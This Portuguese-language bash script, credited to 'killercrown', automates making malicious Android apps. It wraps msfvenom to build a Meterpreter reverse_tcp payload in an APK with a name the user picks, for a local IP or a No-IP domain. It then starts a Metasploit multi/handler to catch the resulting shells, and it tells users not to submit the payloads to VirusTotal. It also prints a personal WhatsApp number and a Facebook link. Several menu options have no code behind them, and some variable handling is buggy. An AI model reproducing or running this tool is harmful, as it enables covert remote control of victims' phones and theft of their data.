#!/bin/bash
# ------------------------------------------------------------------------
# ESTA FERRAMENTA ELA PERMITE GERAR UM PAYLOAD AUTOMATIZADO              *
#                    CREATE BY : killercrown                                   *
#-------------------------------------------------------------------------
# CORES
CYAN="\033[01;36m"
RED="\033[01;31m"
PRETO="\033[30m"
CLARO="\033[33m"
WHITE="\033[01;37m"
NEGRO="\033[01;33m"
CLARO="\033[33m"
dir='/usr/share/metasploit-framework'
dir1='/usr/local/bin/noip2'
ap='/etc/apache2'
lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
mkdir arquivos
if [ $0 == "^C" ]
then
echo "saindo"
fi

#####VERIFICANDO APACHE2
if [ -e $ap ] 
then
echo -e "${CLARO}[✓] APACHE2 ENCONTRADO[✓]"
else
echo -e "[✓]APACHE2 NAO ENCONTRADO[✓]"
fi
###########VERIFICANDO METASPLOIT
if [ -e $dir ]
then
echo -e "${CLARO}[✓]METASPLOIT ENCONTRADO [✓]"
echo "[!] ^C PARA CANCELAR[!]"
else
echo -e "${RED}[-]METASPLOIT NAO ENCONTRAD[-]"
fi
echo "INSTALANDO FIGLET..."
apt-get install figlet > /dev/null
echo -e "${NEGRO}"
echo "____________________________________________________________________________________________"
sleep 0.1
echo "    CONTATO WPP: https://api.whatsapp.com/send?phone=+5511957122490&text=ferramenta%20legal"
sleep 0.1
echo "    CONTATO FACEBOOK:https://www.facebook.com/killercrownw  "
sleep 0.1
echo "               V2.0                                        "
sleep 0.1
echo "               CREATOR: PAULO HENRIQUE                                           "
sleep 0.1
echo "____________________________________________________________________________________________"
sleep 0.1
echo "       _____   ____              _____   ____  ____                             " 
sleep 0.1
echo "      |     | |    | \   / |     |    | |    | |   \                        "
sleep 0.1
echo "      | | __| |____|  \ /  |     |    | |____| |    \                              "
sleep 0.1
echo "      |  |    |    |   |   |     |    | |    | |    /                           "
sleep 0.1
echo "      |__|    |    |   |   |____ |____| |    | |___/                                " 
sleep 0.1
echo "                           ___   ___                        "
sleep 0.1
echo "         | /  |  |    |   |     |   |         "
sleep 0.1
echo "         |/   |  |    |   |___  |___|              "
sleep 0.1
echo "         |\   |  |    |   |     |\          "
sleep 0.1
echo "         | \ _|_ |___ |___|___  | \       "
sleep 0.1
echo "____________________________________________________________________________________________"
echo -e "${RED}| POR FAVOR NAO TESTAR OS PAYLOADS NO WWW.VIRUSTOTAL.COM|"
sleep 0.1
echo "| your sistem: $(uname -a | cut -d '#' -f 1)           |"
sleep 0.1
echo "              $(date)              				"
sleep 0.1
echo "|-------------------------------------------------------| " && read -rsp $'pressiona qualquer tecla para continuar........... \n' -n 1 key
clear


figlet         OPTIONS
echo -e "${WHITE}       CRIADOR DE PAYLOAD(ESCOLHA POR NUMERO)                                          "
echo -e "${RED}   _________________________________________             "
echo "  |    REDES          |   SISTEMAS  |    VERSION  |                                     "
echo "  |___________________|_____________|_____________| "
echo "  |REDE INTERNA       | ANDROID     |0.1|         |[1]"
echo "  |REDE EXTERNA(NOIP) | ANDROID     |0.5|         |[2]"
echo "  |REDE INTERNA       | WINDOWS     |0.1|         |[3]"
echo "  |REDE INTERNA       | LINUX       |0.1|         |[4]                          "
echo "  |  EXIT             |  ()         |0.0|         |[5]"
echo "  -------------------------------------------------    "
echo -e " ┌─["${RED}"KILLER]──[${RED}~]─["$CYAN"menu]:"
      echo -ne  " └─────► "
      read rap
if [ $rap -eq "5" ] 
then
exit 0
fi
if [ $rap -gt 5 ]
then
	echo "Payload invalido" ; exit 0
elif [ $rap -lt 1 ]
then
	echo "Payload invalido" ; exit
fi

########CRIANDO PAYLOAD EM REDE INTERNA######
if [ "$rap" -eq "1" ]
then
cd arquivos
clear
                                echo "        _________                                          "
                                sleep 0.1
                                echo -e "${CLARO}        |o     o |                             "  
                                sleep 0.1
                                echo -e "${CYAN}        |________|                "
                                echo "        |        |                     " 
                                sleep 0.1
                                echo "       /| HACKED | \                       "
                                sleep 0.1
                                echo -e "${RED}      / |        |  \                     "
                                sleep 0.1
                                echo -e "${CYAN}      \ |        |  /                      "
                                sleep 0.1
                                echo -e "${PRETO}        |_      _|                         "
                                sleep 0.1
                                echo "          |     |                                             "
                                sleep 0.1
                                echo "          |     |                                          "
                                sleep 0.1
                                echo -e "${RED}          \/    \/  INTERNA                                       "
                                sleep 0.1
                                echo "  ____          ____    ___   ____   (-)  ____       "
                                sleep 0.1
                                echo " |    | |\   | |    \  |   | |    |   |   |   \  "
                                sleep 0.1
                                echo " |____| | \  | |     \ |___| |    |   |   |    \   "
                                sleep 0.1
                                echo " |    | |  \ | |     / |\    |    |   |   |    / "
                                sleep 0.1
                                echo -e " |    | |   \| |____/  | \   |____|   |   |__/          \n "

echo -e "                               ${CLARO}seu ip interno:$lanip                \n${CYAN}"
echo -e "                               ${CLARO}seu ip externo:"curl ifconfig.me
PAYLOAD='android/meterpreter/reverse_tcp'
echo "DIGITE SEU IP INTERNO      "
echo -e " ┌─["${RED}"KILLER]──[${RED}~]─["$CYAN"menu]:"
      echo -ne  " └─────► "
     read lhost


echo -e "[*]Digite a porta aberta[*]\n"
echo -e " ┌─["${RED}"KILLER]──[${RED}~]─["$CYAN"menu]:"
      echo -ne  " └─────► "
      read lport

echo -e "[*]Digite o nome do aplicativo[*]\n"
echo -e " ┌─["${RED}"KILLER]──[${RED}~]─["$CYAN"menu]:"
      echo -ne  " └─────► "
      read apk

echo "criando payload..." ; msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost  LPORT=$lport R > $apk.apk 2>/dev/null

elif [ $rap -eq "2" ]
then
cd arquivos
if [ -e $dir1 ] 
then
echo -e "PROCURANDO POR NOIP2 EM /usr/local/bin/noip2...\n"
sleep 3.3
echo -e "${CLARO}[✓]NOIP2 ENCONTRADO[✓] "
else
sleep 3.3
echo "[-]NOIP2 NAO ENCONTRADO :( [-]"
echo "INSTALAR O NOIP E TENTE NOVAMENTE"
exit 0
fi
echo "DIGITE SEU DOMINIO DO NOIP     "
echo -e " ┌─["${RED}"KILLER]──[${RED}~]─["$CYAN"menu]:"
      echo -ne  " └─────► "
     read lhost

echo "DIGITE A PORTA ABERTA"
echo -e "┌─["${RED}"KILLER]──[${RED}~]─["${CYAN}"menu]:"
      echo -ne " └─────► "
	read lport

echo -e "[*]Digite o nome do aplicativo[*]\n"
echo -e " ┌─["${RED}"KILLER]──[${RED}~]─["$CYAN"menu]:"
      echo -ne  " └─────► "
      read apk


echo -e "${CLARO}CRIANDO PAYLOAD..." ; msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost  LPORT=$lport R > $apk.apk 2>/dev/null
clear
PAYLOAD='android/meterpreter/reverse_tcp_dns'

fi
clear
echo "ARQUIVO CRIADO COM SUCESSO. DESEJA CONFIGURAR O HANDLER OU IR SAIR? n\y" && read hand
clear
if [ $hand == "y" ]
then
echo -e "${CLARO}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo "[+]OBRIGADO POR USAR ESTA FERRAMENTA [+] "
echo "            PAYLOADS SALVO EM ARQUIVOS"
echo "           ABRINDO O METASPLOIT...  "
echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
sleep 0.2
msfconsole -q -x "use multi/handler ; set PAYLOAD $PAYLOAD ; set LHOST $lhost ; set LPORT $lport ; exploit" 

elif [ $hand == "n" ]
then
echo "DESLIGANDO APACHE2..."
sleep 1
service apache2 stop
echo "APACHE2 DESLIGADO"

echo "OBRIGADO POR USAR ESTA FERRAMENTA"
exit 0
fi


